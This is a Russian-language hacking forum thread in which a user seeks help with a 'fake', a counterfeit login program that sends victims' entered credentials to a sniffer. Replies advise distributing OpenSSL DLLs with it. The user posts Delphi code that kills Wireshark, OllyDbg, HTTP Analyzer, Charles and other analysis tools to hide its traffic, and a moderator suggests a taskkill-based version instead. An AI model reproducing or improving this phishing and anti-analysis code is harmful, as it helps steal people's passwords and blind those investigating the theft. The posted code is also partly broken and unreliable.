delphi xe3 проблемы с программами

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by DJ_TWIX, 13 Feb 2014.

  1. DJ_TWIX

    DJ_TWIX Banned

    Joined:
    17 Jan 2014
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Всем привет
    есть фейк, который с валидацией
    когда у себя на компе я запускаю то валидация работает, "неправильный пароль" пишет и на сниффер не отсылает
    а когда любой пользователь скачивает, то у него все подряд пишеь "авторизовались" и шлет весь бред на сниффер

    чем обьяснить что валидация на других компах не пашет?
     
  2. qw1mb1

    qw1mb1 Member

    Joined:
    8 Feb 2013
    Messages:
    113
    Likes Received:
    16
    Reputations:
    8
    без кода разобраться очень непросто, экстрасенсы все уже вымерли давно, но все же попробую прикинуться вангой. валидация работает через SSL? если да, то вместе с самим фейком надо распространять файлы библиотек SSL, версия которых на компе жертвы может отличаться от твоих. необходимы следующие файлы:
    libeay32.dll
    libssl32.dll
    ssleay32.dll
    искать их надо в системных папках винды (system32)
     
  3. DJ_TWIX

    DJ_TWIX Banned

    Joined:
    17 Jan 2014
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    у меня в этой папке нет файлов таких
     
    #3 DJ_TWIX, 13 Feb 2014
    Last edited: 13 Feb 2014
  4. DJ_TWIX

    DJ_TWIX Banned

    Joined:
    17 Jan 2014
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    эти 3 файла нашел в папке с проектом
    заархивировал все,проверил на виртуалке ничего не поменялось

    вот код

     
  5. #colorblind

    #colorblind Moderator

    Joined:
    31 Jan 2014
    Messages:
    634
    Likes Received:
    246
    Reputations:
    42
    Логично предположить, что
    отрабатывает неверно, предлагаю сменить алгоритм проверки "залогениности", это должно решить проблему
     
  6. DJ_TWIX

    DJ_TWIX Banned

    Joined:
    17 Jan 2014
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    кто знает на что поменять?
     
  7. DJ_TWIX

    DJ_TWIX Banned

    Joined:
    17 Jan 2014
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    ого,я и не думал что обычный фейк будет так сложно сделать
     
  8. #colorblind

    #colorblind Moderator

    Joined:
    31 Jan 2014
    Messages:
    634
    Likes Received:
    246
    Reputations:
    42
    Именно поэтому все прикладные делфекодеры пишут на православном delphi 7, а не на богомерзком xe
    Курите ветку http://forum.sources.ru/index.php?showtopic=306145
     
  9. DJ_TWIX

    DJ_TWIX Banned

    Joined:
    17 Jan 2014
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    подскажите у кого есть этот киллер снифферов?
    http://i33.fastpic.ru/big/2014/0214/7f/282d9046193ec23b86bfd735ba94e27f.png
     
  10. DJ_TWIX

    DJ_TWIX Banned

    Joined:
    17 Jan 2014
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    мне сказали что делфи не читает чтото из кода
    (вот полный код,у меня остаются 3 ошибки (см скрин) которые не убираются)

    Code:
    shellapi, tlhelp32
    
    
    
    
    
    
    function kill(exefilename: string): Integer;
    const
    PROCESS_TERMINATE= $0001;
    var
    continueloop:BOOL;
    fsnapshothandle:THandle;
    FprocessEntry32:TProcessEntry32;
    begin
    result:=0;
    fsnapshothandle:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    fprocessentry32.dwSize:=SizeOf(processentry32);
    Continueloop:=Process32First(fsnapshothandle, fprocessentry32);
    while Integer(continueloop)<>0 do
    begin
    if (UpperCase(ExtractFileName(fprocessentry32.szExeFile)=UpperCase(exefilename))) then
     result := Integer(TerminateProcess(OpenProcess(PROCESS_TERMINATE, bool(0),
     fprocessentry32.th32ProcessID), 0));
     continueloop := Process32Next(fsnapshothandle, fprocessentry32);
     end;
     CloseHandle(fsnapshothandle);
     end;
    end;
    
    
    
    
    
    begin
    Kill('miniperl.exe');
    Kill('httpd.exe');
    Kill('mysqld.exe');
    Kill('ollydbg.exe');
    Kill('httpanalyzerstdv7.exe');
    Kill('httpanalyzerstdv6.exe');
    Kill('httpanalyzerstdv5.exe');
    Kill('charles.exe');
    Kill('wireshark.exe');
    wnd:=FindWindow(nill, 'HTTP Analyzer V6');
    if wnd<>0 then PostMessage(wnd, WM_QUIT, 1, 0);
    wnd:=FindWindow(nill, 'HTTP Analyzer V5');
    if wnd<>0 then PostMessage(wnd, WM_QUIT, 1, 0);
    wnd:=FindWindow(nill, 'HTTP Analyzer V7');
    if wnd<>0 then PostMessage(wnd, WM_QUIT, 1, 0);
    wnd:=FindWindow(nill, 'ollydbg');
    if wnd<>0 then PostMessage(wnd, WM_QUIT, 1, 0);
    wnd:=FindWindow(nill, 'Charles 3.6');
    if wnd<>0 then PostMessage(wnd, WM_QUIT, 1, 0);
    wnd:=FindWindow(nill, 'httpd.exe -w');
    if wnd<>0 then PostMessage(wnd, WM_QUIT, 1, 0);
    end;
     
  11. #colorblind

    #colorblind Moderator

    Joined:
    31 Jan 2014
    Messages:
    634
    Likes Received:
    246
    Reputations:
    42
    Какой-то не правильный киллер. Гораздо эффективнее было бы через ShellExecute вызывать taskkill /f /im. Хотя бы по той простой причине, что это не требует отладочных привилегий, отработает быстрее и кода компактней
     
Loading...
Similar Threads - delphi проблемы программами
  1. Peja
    Replies:
    0
    Views:
    2,538